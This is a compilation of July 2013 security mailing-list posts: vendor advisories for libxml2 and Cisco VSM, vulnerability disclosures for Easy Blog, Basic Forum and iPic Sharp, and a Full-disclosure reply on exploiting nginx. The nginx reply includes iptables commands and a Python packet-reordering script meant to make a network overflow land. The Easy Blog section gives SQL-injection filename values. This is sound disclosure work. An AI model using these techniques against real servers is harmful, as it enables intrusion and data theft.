[ MDVSA-2013:198 ] libxml2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2013:198 http://www.mandriva.com/en/support/security/ ___ Package : libxml2 Date: July 24, 2013 Affected: Business Server 1.0 ___ Problem Description: Multiple vulnerabilities has been discovered and corrected in libxml2: A denial of service flaw was found in the way libxml2, a library providing support to read, modify and write XML and HTML files, performed string substitutions when entity values for external entity references replacement (--noent option) was requested / enabled during the XML file parsing. A remote attacker could provide a specially-crafted XML file containing an external entity expansion, when processed would lead to excessive CPU consumption (denial of service) (CVE-2013-0339). This a different flaw from CVE-2013-0338. parser.c in libxml2 before 2.9.0, as used in Google Chrome before 28.0.1500.71 and other products, allows remote attackers to cause a denial of service (out-of-bounds read) via a document that ends abruptly, related to the lack of certain checks for the XML_PARSER_EOF state (CVE-2013-2877). The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0339 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2877 https://bugzilla.redhat.com/show_bug.cgi?id=915149 https://bugzilla.redhat.com/show_bug.cgi?id=983204 http://advisories.mageia.org/MGASA-2013-0218.html ___ Updated Packages: Mandriva Business Server 1/X86_64: 4ad243c16e07e9f6850513c57cd1aa74 mbs1/x86_64/lib64xml2_2-2.7.8-14.20120229.2.3.mbs1.x86_64.rpm 5bae4c7471edb1a4dfe267588b8f9160 mbs1/x86_64/lib64xml2-devel-2.7.8-14.20120229.2.3.mbs1.x86_64.rpm 6800af0e5ca7348bf35596e57ee0 mbs1/x86_64/libxml2-python-2.7.8-14.20120229.2.3.mbs1.x86_64.rpm 8af9449c2a438abccd86ff5d044b2e71 mbs1/x86_64/libxml2-utils-2.7.8-14.20120229.2.3.mbs1.x86_64.rpm 956fd0fbd8ccd0a705747ea469b87ff7 mbs1/SRPMS/libxml2-2.7.8-14.20120229.2.3.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFR73zmmqjQ0CJFipgRAtsGAKDJR0iwQF2gTcRBeeSbrOwlZu32nQCg00k2 LR1DXtKaEMdY9lPgXZLzldg= =bsXw -END PGP SIGNATURE-
Re: [Full-disclosure] nginx exploit documentation, about a generic way to exploit Linux targets
Hello everybody, Ioctl is needed to set the nginx socket blocking so another call to write(2) will read much more memory than it is possible with the default non-blocking connection of nginx. This vulnerability was published recently and it seems that many exploiters got stuck because the socket will not block because the buffer is longer than the standard ethernet MTU, some others have found another attack vector without that problem. Let me to explain how we have achieved to overcome the non-blocking socket impediment without doing so much: When packets arriving at the TCP layer are analyzed and once determined the sequence are immediately delivered to the upper layer of the OSI model. Let's imagine that you want to overflow a big buffer through the network. Normally you would execute something like; send(sock, A….A,…); If the size of the data is bigger than the MTU, is then splitted into multiple packages. The destination processes the information on many smaller packages instead of one. In summary,the read()/recv() doesn't get all the data and the overflow is not done. And that's what's happening on ngingx. What we have done to prevent that packets are delivered directly to the next layer is taking profit of TCP windows and TCP reorder: sending the first package on the last place. What happens is that the TCP stack will not deliver the packets to the next layer because the information is not complete, and just wait until all information (up to the size of the tcp window) is received to deliver it. Then the application layer will get all the information in _the same_ read an the overflow will happen. Using that TCP trick, the size limitation of the overflow is the TCP window size instead the MTU. One easy and **dirty** way to implement this is using iptables and nfqueue, but there are some better ones: # iptables -A OUTPUT -p tcp -d IP --destination-port PORT -j NFQUEUE # python nfq.py Regards, ===/ nfq.py /=== import nfqueue import socket import time data_count = 0 delayed = None def cb(dummy, payload): global data_count global delayed data = payload.get_data() # DIRTY for first data package (not three-way-handshake) if len(data) 60: data_count += 1 if (data_count == 1): delayed = payload print data # Just DROP the packet and the local TCP stack will send it again because won't get the ACK. payload.set_verdict(nfqueue.NF_DROP) else: data_count = 0 q = nfqueue.queue() q.open() q.bind(socket.AF_INET) q.set_callback(cb) q.create_queue(0) try: q.try_run() except KeyboardInterrupt: print Exiting... q.unbind(socket.AF_INET) q.close() ===/ nfq.py /=== On 23 July 2013 19:49, king cope isowarez.isowarez.isowa...@googlemail.com wrote: (see attachment) /Kingcope ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Albert Puigsech Galicia + Mail: alb...@puigsech.com + Jabber: alb...@puigsech.com + Twitter: @apuigsech + Web: file:///dev/null
Easy Blog by JM LLC - Multiple Vulnerabilities
Dear all, I have discovered some vulnerabilities in Easy Blog, developed by JM LLC. Cheers, Sp3ctrecore ## ADVISORY ## === Easy Blog JM LLC - Multiple Vulnerabilities === Software: Easy Blog Software link...: http://www.jmagness.com/download/Easy_Blog.zip Vendor..: JM LLC Vendor homepage.: http://www.jmagness.com Exploit author..: Sp3ctrecore Contact.: sp3ctrecore[at]gmail[dot]com OVERVIEW Easy Blog is affected by multiple vulnerabilities. --- DISCLOSURE TIMELINE --- 04/07/2013 -- Multiple vulnerabilities discovered and reported to the vendor. 19/07/2013 -- The vendor confirmed the vulnerabilities, but has no time to fix them. 24/07/2013 -- Public disclosure. --- VULNERABILITIES --- [01] SHELL UPLOAD The image upload function in add.php allows unrestricted file upload. An attacker may upload a shell gaining unauthorized access to the system. [02] MULTIPLE SQL INJECTIONS I. add.php - filename parameter (POST request) An attacker may upload a file with a crafted name (e.g. file.txt',(select version()))-- -) injecting SQL code. The content is readable in the homepage. II. edit.php - filename parameter (POST request) An attacker may upload a file with a crafted name (e.g. file.txt',POST=(select version()) WHERE id=1-- -) injecting SQL code. The content is readable in the homepage. [03] MULTIPLE CROSS-SITE SCRIPTING I. add.php - title parameter (POST request): stored XSS. II. add.php - keywords parameter (POST request): stored XSS. III. add.php - description parameter (POST request): stored XSS. IV. add.php - slug parameter (POST request): reflected XSS.
Cisco Security Advisory: Multiple Vulnerabilities in the Cisco Video Surveillance Manager
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Cisco Security Advisory: Multiple Vulnerabilities in the Cisco Video Surveillance Manager Advisory ID: cisco-sa-20130724-vsm Revision 1.0 For Public Release 2013 July 24 16:00 UTC (GMT) +- Summary === The Cisco Video Surveillance Manager (VSM) allows operations managers and system integrators to build customized video surveillance networks to meet their needs. Cisco VSM provides centralized configuration, management, display, and control of video from Cisco and third-party surveillance endpoints. Multiple security vulnerabilities exist in versions of Cisco VSM prior to 7.0.0, which may allow an attacker to gain full administrative privileges on the system. More information on Cisco VSM can be found at http://www.cisco.com/en/US/products/ps10818/index.html. Cisco has released software updates that address these vulnerabilities. Workarounds that mitigate these vulnerabilities are available. This advisory is available at the following link: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130724-vsm -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.19 (Darwin) iF4EAREKAAYFAlHv3iUACgkQUddfH3/BbTrV2wD8DLMSP/vWdottEKUxbtuV1oQ+ tq7vz7Be9Q5mKn74ZsoA/1R7qkDcrmeKQTuBky432DtScteMcfbys0vD9pcQYoqU =HloY -END PGP SIGNATURE-
Basic Forum by JM LLC - Multiple Vulnerabilities
Dear all, I have discovered some vulnerabilities in Basic Forum, developed by JM LLC. Cheers, Sp3ctrecore ## ADVISORY ## Basic Forum by JM LLC - Multiple Vulnerabilities Software: Basic Forum Software link...: http://www.jmagness.com/download/Basic_Forum.zip Vendor..: JM LLC Vendor homepage.: http://www.jmagness.com Exploit author..: Sp3ctrecore Contact.: sp3ctrecore[at]gmail[dot]com OVERVIEW Basic Forum is affected by multiple vulnerabilities. --- DISCLOSURE TIMELINE --- 04/07/2013 -- Multiple vulnerabilities discovered and reported to the vendor. 19/07/2013 -- The vendor confirmed the vulnerabilities, but has no time to fix them. 24/07/2013 -- Public disclosure. --- VULNERABILITIES --- [01] MULTIPLE SQL INJECTIONS I. new.php - title parameter (POST request). II. new.php - post parameter (POST request). III. post.php?id=1 - reply parameter (POST request). [02] MULTIPLE CROSS-SITE SCRIPTING I. user.php - firstname parameter (POST request): stored XSS. II. user.php - bio parameter (POST request): stored XSS. III. new.php - title parameter (POST request): stored XSS. IV. new.php - post parameter (POST request): stored XSS. [03] Cross-site Request Forgery I. user.php - firstname parameter (POST request). II. user.php - email parameter (POST request). III. user.php - password parameter (POST request). IV. user.php - bio parameter (POST request). V. new.php - title parameter (POST request). VI. new.php - post parameter (POST request). VII. post.php - reply parameter (POST request).
iPic Sharp v1.2.1 Wifi iOS - Persistent Foldername Web Vulnerability
Title:
==
iPic Sharp v1.2.1 Wifi iOS - Persistent Foldername Web Vulnerability
Date:
=
2013-07-24
References:
===
http://www.vulnerability-lab.com/get_content.php?id=1031
VL-ID:
=
1031
Common Vulnerability Scoring System:
3.6
Introduction:
=
iPic Sharp Pro is a photos/video management app,can manage your photos/video
into folders and subfolders,
Compress photos/folders into zip file and extract photos from a compressed
(zip/rar), Use password protect
your files, and transfer photos/(zip/rar) between computer and your devices.
Password protect
Password lock entire app
Password lock wifi
Password lock individual folder
View Photos
Photo gallery
Slide show
Thumbnail preview
View Photos app
File Sharing
USB File Sharing via iTunes
Http File Sharing via WiFi, Support Safari, chrome, firefox and IE6/7/8/9
(Slide show )
Chrome and Firefox Supported upload multiple files
Email multiple files, folder Supported
Archives
Extract photos from a compressed zip/rar file
Compression files/folders to zip file
Archives rename, email, batch
( Copy of the Homepge:
https://itunes.apple.com/en/app/ipic-sharp-pro/id449820537 )
Abstract:
=
The Vulnerability Laboratory Research Team discovered a persistent input
validation vulnerability in the iPic Sharp v1.2.1 application (Apple iOS - iPad
iPhone).
Report-Timeline:
2013-07-24:Public Disclosure (Vulnerability Laboratory)
Status:
Published
Affected Products:
==
Apple AppStore
Product: iPic Sharp - Application 1.2.1
Exploitation-Technique:
===
Local
Severity:
=
Medium
Details:
A persistent input validation web vulnerability is detected in the iPic Sharp
v1.2.1 application (Apple iOS - iPad iPhone).
The bug allows an attacker (remote) to implement/inject malicious script code
to the application side (persistent) of the device.
The vulnerability is located in the index file dir listing module of the
web-server (http://localhost:41493) when processing to
request via POST method local manipulated `album folder names`. The persistent
script code will be executed in the main
index file dir listing module when the service lists the new malicious injected
foldername as separate item. Attackers can locally
change the normal album names inside of the apple iOS device (ipad or iphone)
to execute the code when a user is requesting the
mobile application index with the foldername listing.
Exploitation of the persistent web vulnerability requires low user interaction
and a local privilege application device account.
Successful exploitation of the vulnerability can lead to persistent session
hijacking (customers), account steal via persistent
web attacks, persistent phishing or stable (persistent) certificate mail
notification context manipulation.
Vulnerable Application(s):
[+] iPic Sharp v1.2.1 - ITunes or AppStore
(Apple)
Vulnerable Module(s):
[+] Index
Vulnerable Parameter(s):
[+] foldername
Affected Module(s):
[+] Index File Dir - Foldername Listing
Proof of Concept:
=
The persistent input validation web vulnerability can be exploited by local
attackers with low user interaction and no privilege
mobile web application user account. For demonstration or reproduce ...
PoC: Root Parameter
{'isSecret'0,'isSame'1,'isDelete'0,'guid''136'','albumtype'137,'items'[{'PhotoSharp_System_Photo'[{'name''Camera
Roll','isdir'1,'id'0,'filesize'0,'modDate''','url''(null)','section''PhotoSharp_System_Photo','localsection''System
Photos','ispass'0}]},
{'PhotoSharp_Local_Photo'[{'name''.[PERSISTENT INJECTED SCRIPT
CODE!]','isdir'1,'id'0,'filesize'102,'modDate''2013-07-20
145009','url''','section''PhotoSharp_Local_Photo','localsection''Local
Photos','ispass'0}]},
{'PhotoSharp_Local_Document'[{'name''PhotoSharp_Local_Document','isdir'1,'id'0,'filesize'0,'modDate''','url'''
,'section''PhotoSharp_Local_Document','localsection''[PERSISTENT INJECTED
SCRIPT CODE!]','ispass'0}]}],'dir''','dirlocal'''}
PoC: Source
trtd class=photoTd classname=photoTddiv id=PhotoSharp_System_Photo_0
class=watermarkStart
classname=watermarkStarta
href=javascript:loadDir('%2Fu%2FCamera%2520Roll%3FisSystem%3D1','PhotoSharp_System_Photo_0',
'%2Fu%2FCamera%2520Roll');img
src=iPic%20Sharp_files/Camera%2520Roll_75_75.jpg
id=img_PhotoSharp_System_Photo_0
realurl=(null) class=logoStart classname=logoStart/aspan
class=spanAlbum classname=spanAlbumCamera Roll/span/div/td
td class=photoTd classname=photoTddiv id=PhotoSharp_Local_Photo_0
class=watermarkStart classname=watermarkStart
a
href=javascript:loadDir('%2Fu%2F.Default%2520Album%3FisSystem%3D0','PhotoSharp_Local_Photo_0','%2Fu%2F.[PERSISTENT
INJECTED SCRIPT CODE!]');
img src=[PERSISTENT INJECTED SCRIPT
